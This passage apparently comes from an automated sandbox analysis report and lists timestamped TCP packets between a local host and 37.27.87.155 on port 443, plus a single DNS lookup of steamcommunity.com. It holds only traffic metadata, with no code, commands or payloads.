                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.375952005 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.375958920 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.376045942 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.418941021 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.419012070 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.419097900 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.419097900 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.419106960 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.419153929 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.453825951 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.453902006 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.453970909 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.453970909 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.453979969 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.454045057 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478663921 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478734016 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478831053 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478841066 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478885889 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.478885889 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.502703905 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.502757072 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.503010988 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.503021955 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.503084898 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.522856951 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.522902012 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.522964001 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.522974014 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.523013115 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.523013115 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542757988 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542807102 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542836905 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542845011 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542886019 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.542886019 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557583094 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557679892 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557693005 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557713985 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557754040 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557754040 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557759047 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.557847023 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.558140039 CEST49750443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.558157921 CEST4434975037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.652781963 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.652817965 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.652894020 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.653177977 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:24.653192997 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.093821049 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.093961000 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.094624996 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.094638109 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.094791889 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.094798088 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787550926 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787607908 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787623882 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787647963 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787667036 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787667990 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787699938 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787709951 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787724972 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.787755966 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886524916 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886548042 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886631966 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886658907 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886681080 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:25.886708975 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.026875019 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.026900053 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.027000904 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.027036905 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.027086020 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123349905 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123420954 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123454094 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123467922 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123497009 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.123508930 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186499119 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186585903 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186630964 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186647892 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186669111 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186686993 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186758041 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.186815977 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.187263012 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.187283039 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360568047 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360594988 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360667944 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360918045 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.360933065 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.800988913 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801259041 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801569939 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801579952 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801788092 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801788092 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801795959 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:26.801805973 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633713007 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633758068 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.633820057 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.634057999 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.634073019 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721510887 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721586943 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721606016 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721653938 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721693993 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.721740961 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.722562075 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:27.722573042 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.104967117 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105035067 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105539083 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105549097 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105770111 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.105776072 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.979762077 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.979820967 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.980021954 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.980026007 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.980077028 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.980310917 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.980339050 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.983462095 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.983546972 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.983848095 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.983957052 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:28.983984947 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.456600904 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.456733942 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.472830057 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.472882032 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.473393917 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:29.473445892 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338535070 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338690996 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338725090 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338747978 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338782072 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.338829041 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.341686964 CEST49754443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.341730118 CEST4434975437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.361908913 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.361979008 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.362113953 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.362334967 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.362359047 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.802669048 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:30.802880049 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:31.813355923 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:31.813442945 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:31.813481092 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:31.813496113 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.598923922 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599018097 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599050999 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599097013 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599107981 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599327087 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599888086 CEST49755443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.599931002 CEST4434975537.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.874944925 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.875025034 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.875166893 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.875452995 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:32.875468016 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.314343929 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.314456940 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315185070 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315196037 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315669060 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315675974 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315825939 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315845013 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315905094 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.315911055 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316086054 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316106081 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316262007 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316278934 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316387892 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316401958 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316514969 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316525936 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316659927 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316677094 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316798925 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:33.316814899 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065032959 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065208912 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065238953 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065280914 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065289021 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065354109 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065450907 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065455914 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065483093 CEST4434975637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.065502882 CEST49756443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.068924904 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.068965912 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.069039106 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.069252014 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.069261074 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.503573895 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.503648043 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.504854918 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.504870892 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.505017996 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:35.505023956 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351702929 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351834059 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351882935 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351921082 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351960897 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.351993084 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.352312088 CEST49757443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.352348089 CEST4434975737.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354499102 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354559898 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.354754925 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.355057001 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.355068922 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.795419931 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.795737982 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796222925 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796252966 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796397924 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:36.796412945 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643594027 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643701077 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643762112 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643795013 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643826962 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643856049 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643919945 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:37.643949986 CEST4434975837.27.87.155192.168.2.4

                                                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:57.809856892 CEST5056653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:57.915806055 CEST53505661.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:57.809856892 CEST192.168.2.41.1.1.10x814cStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
